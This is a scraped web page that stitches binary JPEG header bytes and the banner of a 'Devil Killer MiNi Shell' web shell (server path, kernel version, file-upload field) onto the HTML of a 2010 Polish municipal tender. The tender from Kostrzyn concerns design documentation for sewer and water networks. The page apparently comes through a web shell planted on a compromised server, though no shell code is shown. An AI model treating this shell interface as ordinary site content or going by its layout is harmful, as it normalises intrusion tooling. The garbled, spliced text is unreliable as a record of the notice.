JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100616/169700-N-2010.html

<p class="kh_header"><b>Kostrzyn: Przetarg nieograniczony na opracowanie dokumentacji technicznej</b><br>
<b>Numer ogłoszenia: 169700 - 2010; data zamieszczenia: 16.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Komunalny , ul. Poznańska 2, 62-025 Kostrzyn, woj. wielkopolskie, tel. 0618178239, faks 061 8970908.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kostrzyn.wlkp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka administracyjna jednostki samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na opracowanie dokumentacji technicznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest :
OPRACOWANIE DOKUMENTACJI TECHNICZNEJ BUDOWY:
ZADANIE 1 -  KANALIZACJI SANITARNEJ  I DESZCZOWEJ W KOSTRZYNIE (OSIEDLE KÓRNICKIE) w skład przedmiotu zamówienia wchodzi:
1.Wykonanie technicznych badań podłoża gruntowego,
2.Opracowanie po 5 egzemplarzy projektów budowlanych i wykonawczych ;
a)budowy kanalizacji sanitarnej z przyłączami
b)budowy kanalizacji deszczowej
3.Projektu organizacji ruchu,
4.Uzyskanie dla Zamawiającego decyzji środowiskowej i decyzji o lokalizacji inwestycji celu/decyzji o warunkach zabudowy i zagospodarowania terenu dla odcinków sieci projektowanych poza terenem objętym miejscowym planem zagospodarowania przestrzennego;
5.Uzyskanie aktualnych wpisów z rejestru gruntu dla działek, przez które przebiegać będą projektowane sieci wraz  wyrysem i mapą do celów projektowych, umożliwiające uzyskanie decyzji o lokalizacji inwestycji celu publicznego/decyzji o warunkach zabudowy i zagospodarowania terenu oraz decyzji o pozwoleniu na budowę. Decyzje te i związane z ich pozyskaniem dokumenty powinny zostać  wydane odrębnie dla poszczególnych branż;
6.Wykonanie w razie konieczności oceny warunków geologiczno - inżynierskich, operatu wodno prawnego, sporządzenie raportu oddziaływania na środowisko oraz uzyskanie dla Zamawiającego decyzji środowiskowej;
7.Uzyskanie dla Zamawiającego pozwolenia na budowę;
8.Uzgodnienie projektu w zakresie wymaganym przez prawo, jak również uzgodnienie w zakresie uzbrojenia terenu . Ponadto projekt winien posiadać  wszystkie niezbędne uzgodnienia branżowe.
9.Przekazanie projektów wraz z niezbędnymi uzgodnieniami i podpisem sprawdzającego zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2004 r. poz.2072 z późn.zm.)- 5 egzemplarzy.
10.Opracowanie przedmiarów robót (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego-Dz.U. z 2004 r. Nr 202 poz.2072 z późn.zm.) - 5 egzemplarzy; informację dotyczącą bezpieczeństwa i ochrony zdrowia , w przypadkach gdy jej opracowanie jest wymagane na podstawie odrębnych przepisów.
11.Sporządzenie kosztorysu inwestorskiego z uwzględnieniem wszystkich kosztów w oparciu o rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 18 maja 2004 r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego (Dz.U. z 2004 r.Nr 130 poz.1389);
12.Opracowanie specyfikacji technicznych wykonania i odbioru robót (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-uzytkowego-Dz.U. z 2004 r. Nr 202 poz.2072 z późn.zm.)- po 5 egzemplarzy;
13.Do wersji  pisemnej należy załączyć wersję elektroniczną na płycie CD zawierającej specyfikacje techniczne wykonania i odbioru robót, projekt budowlano-wykonawczy, profile, schematy i przedmiary robót w formie umożliwiającej zamieszczenie plików  na stronie internetowej Zamawiającego (PDF) również na płycie CD zapisać kosztorys inwestorski, przedmiar, kosztorys ofertowy. Ww elementy muszą być opracowane zgodnie z obowiązującymi przepisami prawa.
14.Szacunkowa długość ulic objęta zadaniem wynosi ok.9.000m.
a) Budowa kanalizacji sanitarnej w Osiedlu Kórnickim musi  nawiązywać do istniejącej  kanalizacji sanitarnej w ulicach: Andrzejewo, Jana Pawła II, Storczykowej, Wyszyńskiego i Bławatkowej.
b)Budowa kanalizacji deszczowej obejmuje Osiedle Kórnickie.
 Zakres prac na załączonej mapie nr 1
Uwaga: Zamawiający dostarczy Wykonawcy podkłady geodezyjne w skali 1 : 500.
ZADANIE 2 - WYMIANA SIECI KANALIZACJI SANITARNEJ I BUDOWA ODCINKA SIECI KANALIZACJI SANITARNEJ  Z PRZYŁĄCZAMI  W KOSTRZYNIE ORAZ WYMIANĘ SIECI WODOCIĄGOWEJ WRAZ Z PRZYŁĄCZAMI  W UL. WARSZAWSKIEJ W KOSTRZYNIE.

W skład przedmiotu zamówienia wchodzi:
1.Wymiana ok. 220 m kanalizacji sanitarnej i budowa odcinka sieci kanalizacji sanitarnej ok. 150 m  z przyłączami.
2. Wymiana sieci wodociągowej wraz z przyłączami w ul. Warszawskiej w Kostrzynie  w dwóch etapach.
Etap I:
1Wymiana sieci kanalizacji sanitarnej wraz z przyłączami - ok. 43 m od ul. Dworcowej oraz ok. 180 m od ul. Średzkiej.
2.Budowa sieci kanalizacji sanitarnej wraz z przyłączami od skrzyżowania z ul. Dworcową ok. 150 m.
3.Wymiana sieci wodociągowej ok. 170 m rura PCV O 110 wraz z przyłączami PE O 32 o długości ok. 90 m od ul. Dworcowej do ul. Średzkiej.
Etap II:
1.Wymiana sieci kanalizacji sanitarnej ok. 490 m, rura PCV O 400 wraz z przyłączami (od ul. Dworcowej do ul. Półwiejskiej).
2.Wymiana i rozbudowa sieci wodociągowej o długości  ok. 250 m, rura PCV O 80 oraz 180 m rura PCV O 150 wraz z przyłączami od ul. Dworcowej do ul. Półwiejskiej.
Zakres prac na załączonej mapie nr 2
Dokumentacja projektowa powinna zawierać:
1.Projety  po 5 szt. budowlane  i wykonawcze z podziałem na ETAP I i ETAP II
2.Wykonanie technicznych badań podłoża gruntowego,
3.Wykonanie map sytuacyjno-wysokościowej do celów projektowych,
4.Uzyskanie dla Zamawiającego decyzji środowiskowej i decyzji o lokalizacji inwestycji celu/decyzji o warunkach zabudowy i zagospodarowania terenu dla odcinków sieci projektowanych poza terenem objętym miejscowym planem zagospodarowania przestrzennego;
5.Projekty odtworzenia nawierzchni drogowych wraz z jego uzgodnieniem.
6.Inwentaryzacja drzew do wycinki jeżeli zaistnieje taka potrzeba.
7.Obowiązkiem wykonawcy będzie uzgodnienie w formie pisemnej z właścicielami posesji warunków wymiany przyłączy.
8.Uzyskanie aktualnych wpisów z rejestru gruntu dla działek, przez które przebiegać będą projektowane sieci wraz  wyrysem i mapą do celów projektowych, umożliwiające uzyskanie decyzji o lokalizacji inwestycji celu publicznego/decyzji o warunkach zabudowy i zagospodarowania terenu oraz decyzji o pozwoleniu na budowę. Decyzje te i związane z ich pozyskaniem dokumenty powinny zostać  wydane odrębnie dla poszczególnych branż;
9.Wykonanie w razie konieczności oceny warunków geologiczno - inżynierskich, operatu wodno prawnego, sporządzenie raportu oddziaływania na środowisko oraz uzyskanie dla Zamawiającego decyzji środowiskowej;
10.Uzyskanie dla Zamawiającego pozwolenia na budowę;
11.Uzgodnienie projektu w zakresie wymaganym przez prawo, jak również uzgodnienie w zakresie uzbrojenia terenu . Ponadto projekt winien posiadać  wszystkie niezbędne uzgodnienia branżowe.
12.Przekazanie projektów wraz z niezbędnymi uzgodnieniami i podpisem sprawdzającego zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2004 r. poz.2072 z późn.zm.)- 5 egzemplarzy; informację dotyczącą bezpieczeństwa i ochrony zdrowia , w przypadkach gdy jej opracowanie jest wymagane na podstawie odrębnych przepisów.

13.Opracowanie przedmiarów robót (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego-Dz.U. z 2004 r. Nr 202 poz.2072 z późn.zm.) - 5 egzemplarzy;
14.Sporządzenie kosztorysu inwestorskiego z uwzględnieniem wszystkich kosztów w oparciu o rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 18 maja 2004 r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego (Dz.U. z 2004 r.Nr 130 poz.1389);
15.Opracowanie specyfikacji technicznych wykonania i odbioru robót (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego-Dz.U. z 2004 r. Nr 202 poz.2072 z późn.zm.)- po  5 egzemplarzy;
16.Do wersji  pisemnej należy załączyć wersję elektroniczną na płycie CD zawierającej specyfikacje techniczne wykonania i odbioru robót, projekt budowlano-wykonawczy, profile, schematy i przedmiary robót w formie umożliwiającej zamieszczenie plików  na stronie internetowej Zamawiającego (PDF) również na płycie CD zapisać kosztorys inwestorski, przedmiar, kosztorys ofertowy. Ww. elementy muszą być opracowane zgodnie z obowiązującymi przepisami prawa.
Zakres prac na załączonej mapie nr 2 a, 2b.
ZADANIE 3 - BUDOWĘ SIECI WODOCIĄGOWEJ W MIEJSCOWOŚCI CZERLEJNO, UL. KLONOWSKA , GMINA KOSTRZYN
Przedmiotem zamówienia jest : budowa sieci wodociągowej PCV O 110 o długości 120 m  w ul. Klonowskiej (obręb działki  132 ) w Czerlejnie. 
Dokumentacja projektowa powinna zawierać:
1.Wykonanie technicznych badań podłoża gruntowego,
2.Wykonanie map sytuacyjno-wysokościowej do celów projektowych,
3.Opracowanie po 5 egzemplarzy projektów budowlanych i wykonawczych ;
4.Projektu organizacji ruchu,
5.Uzyskanie aktualnych wpisów z rejestru gruntu dla działek, przez które przebiegać będą projektowane sieci wraz  wyrysem i mapą do celów projektowych, umożliwiające uzyskanie decyzji o lokalizacji inwestycji celu publicznego/decyzji o warunkach zabudowy i zagospodarowania terenu oraz decyzji o pozwoleniu na budowę. Decyzje te i związane z ich pozyskaniem dokumenty powinny zostać  wydane odrębnie dla poszczególnych branż;
6.Wykonanie w razie konieczności oceny warunków geologiczno - inżynierskich, operatu wodno prawnego, sporządzenie raportu oddziaływania na środowisko oraz uzyskanie dla Zamawiającego decyzji środowiskowej;
7.Uzyskanie dla Zamawiającego pozwolenia na budowę;
8.Uzgodnienie projektu w zakresie wymaganym przez prawo, jak również uzgodnienie w zakresie uzbrojenia terenu . Ponadto projekt winien posiadać  wszystkie niezbędne uzgodnienia branżowe.
9.Przekazanie projektów wraz z niezbędnymi uzgodnieniami i podpisem sprawdzającego zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2004 r. poz.2072 z późn.zm.)- 5 egzemplarzy; Informację dotyczącą bezpieczeństwa i ochrony zdrowia , w przypadkach gdy jej opracowanie jest wymagane na podstawie odrębnych przepisów.
10.Opracowanie przedmiarów robót (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego-Dz.U. z 2004 r. Nr 202 poz.2072 z późn.zm.) - 5 egzemplarzy;
11.Sporządzenie kosztorysu inwestorskiego z uwzględnieniem wszystkich kosztów w oparciu o rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 18 maja 2004 r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego (Dz.U. z 2004 r.Nr 130 poz.1389);
12.Opracowanie specyfikacji technicznych wykonania i odbioru robót (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego-Dz.U. z 2004 r. Nr 202 poz.2072 z późn.zm.)- po egzemplarzy;
13.Do wersji  pisemnej należy załączyć wersję elektroniczną na płycie CD zawierającej specyfikacje techniczne wykonania i odbioru robót, projekt budowlano-wykonawczy, profile, schematy i przedmiary robót w formie umożliwiającej zamieszczenie plików  na stronie internetowej Zamawiającego (PDF) również na płycie CD zapisać kosztorys inwestorski, przedmiar, kosztorys ofertowy. Ww. elementy muszą być opracowane zgodnie z obowiązującymi przepisami prawa.
ZAKRES zadania  na załączonej mapie nr 3
ZADANIE 4 - BUDOWĘ SIECI  WODOCIĄGOWEJ W ULICY WRZESIŃSKIEJ W KOSTRZYNIE.
Przedmiotem zmówienia jest opracowanie dokumentacji na budowę sieci wodociągowej z rur PCV O 90 o długości 110 m do działek nr 666/1 i 666/2  w ul. Wrzesińskiej w Kostrzynie. Wcinka w istniejący rurociąg w ul. Średzkiej zakończona hydrantem O 80 na ul. Wrzesińskiej.                                                                                                                                                                                                                                                                                                                 
Dokumentacja projektowa powinna zawierać:
1.Wykonanie technicznych badań podłoża gruntowego,
2.Wykonanie map sytuacyjno-wysokościowej do celów projektowych,
3.Opracowanie po 5 egzemplarzy projektów budowlanych i wykonawczych ;
4.Projektu organizacji ruchu,
5.Uzyskanie aktualnych wpisów z rejestru gruntu dla działek, przez które przebiegać będą projektowane sieci wraz  wyrysem i mapą do celów projektowych, umożliwiające uzyskanie decyzji o lokalizacji inwestycji celu publicznego/decyzji o warunkach zabudowy i zagospodarowania terenu oraz decyzji o pozwoleniu na budowę. Decyzje te i związane z ich pozyskaniem dokumenty powinny zostać  wydane odrębnie dla poszczególnych branż;
6.Wykonanie w razie konieczności oceny warunków geologiczno - inżynierskich, operatu wodno prawnego, sporządzenie raportu oddziaływania na środowisko oraz uzyskanie dla Zamawiającego decyzji środowiskowej;
7.Uzyskanie dla Zamawiającego pozwolenia na budowę;
8.Uzgodnienie projektu w zakresie wymaganym przez prawo, jak również uzgodnienie w zakresie uzbrojenia terenu . Ponadto projekt winien posiadać  wszystkie niezbędne uzgodnienia branżowe.
9.Przekazanie projektów wraz z niezbędnymi uzgodnieniami i podpisem sprawdzającego zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2004 r. poz.2072 z późn.zm.)- 5 egzemplarzy.
10.Opracowanie przedmiarów robót (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego-Dz.U. z 2004 r. Nr 202 poz.2072 z późn.zm.) - 5 egzemplarzy; informację dotyczącą bezpieczeństwa i ochrony zdrowia , w przypadkach gdy jej opracowanie jest wymagane na podstawie odrębnych przepisów.
11.Sporządzenie kosztorysu inwestorskiego z uwzględnieniem wszystkich kosztów w oparciu o rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 18 maja 2004 r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego (Dz.U. z 2004 r.Nr 130 poz.1389);
12.Opracowanie specyfikacji technicznych wykonania i odbioru robót (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego-Dz.U. z 2004 r. Nr 202 poz.2072 z późn.zm.)- po egzemplarzy;
13.Do wersji  pisemnej należy załączyć wersję elektroniczną na płycie CD zawierającej specyfikacje techniczne wykonania i odbioru robót, projekt budowlano-wykonawczy, profile, schematy i przedmiary robót w formie umożliwiającej zamieszczenie plików  na stronie internetowej Zamawiającego (PDF) również na płycie CD zapisać kosztorys inwestorski, przedmiar, kosztorys ofertowy. Ww. elementy muszą być opracowane zgodnie z obowiązującymi przepisami prawa.
14.Uzyskanie  pisemnej akceptacji właścicieli  działek.
ZAKRES zadania  na załączonej mapie nr 4.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.22.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w okresie ostatnich trzech lat przed dniem wszczęcia  postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał  lub wykonuje z należytą starannością co najmniej jedno zamówienie dotyczące wykonywania dokumentacji projektowej w zakresie zgodnym z przedmiotem zamówienia określonego w pkt. III SIWZ, oraz dysponuje odpowiednimi dokumentami potwierdzającymi, ze usługi/roboty zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazu osób ((wg wzoru - zał. nr 7 do SIWZ), które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, Oświadczenia, że osoby które będą wykonywać zamówienie posiadają wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymóg:Wykonawca musi dysponować odpowiednią liczba pracowników fachowców gwarantującą terminowe i profesjonalne wykonanie zamówienia.Ocena odbywać sie bedzie na zasadzie spełnia-nie spelnia w oparciu o wymagane przez Zamawiającego i złozone przez Wykonawce dokumenty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
